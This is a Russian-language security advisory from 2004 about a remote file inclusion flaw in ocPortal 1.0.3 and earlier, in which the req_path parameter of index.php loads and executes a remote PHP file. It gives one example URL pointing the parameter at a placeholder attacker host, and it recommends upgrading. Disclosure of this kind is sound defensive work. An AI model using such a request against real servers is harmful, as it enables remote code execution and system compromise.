Выполнение произвольных команд в ocPortal

Дата публикации:
16.10.2004
Всего просмотров:
1835
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
ocPortal 1.x
Уязвимые версии: ocPortal 1.0.3 и более ранние версии

Описание:
Уязвимость обнаружена в ocPortal. Удаленный атакующий может выполнить произвольный PHP сценарий.

Уязвимость существует из-за некорректной обработки входных данных в переменной $req_path в файле index.php. Удаленный атакующий может в качестве параметра уязвимой переменной указать удаленный файл, который будет выполнен на целевом сервере. Пример:

http://[target]/ocp-103/index.php?req_path=http://[attacker]/

URL производителя: ocportal.com

Решение: Установите новую версию:

ocportal.com/index.php?page=download

Ссылки: ocPortal index.php Include File Error Lets Remote Users Execute Arbitrary Commands

или введите имя

CAPTCHA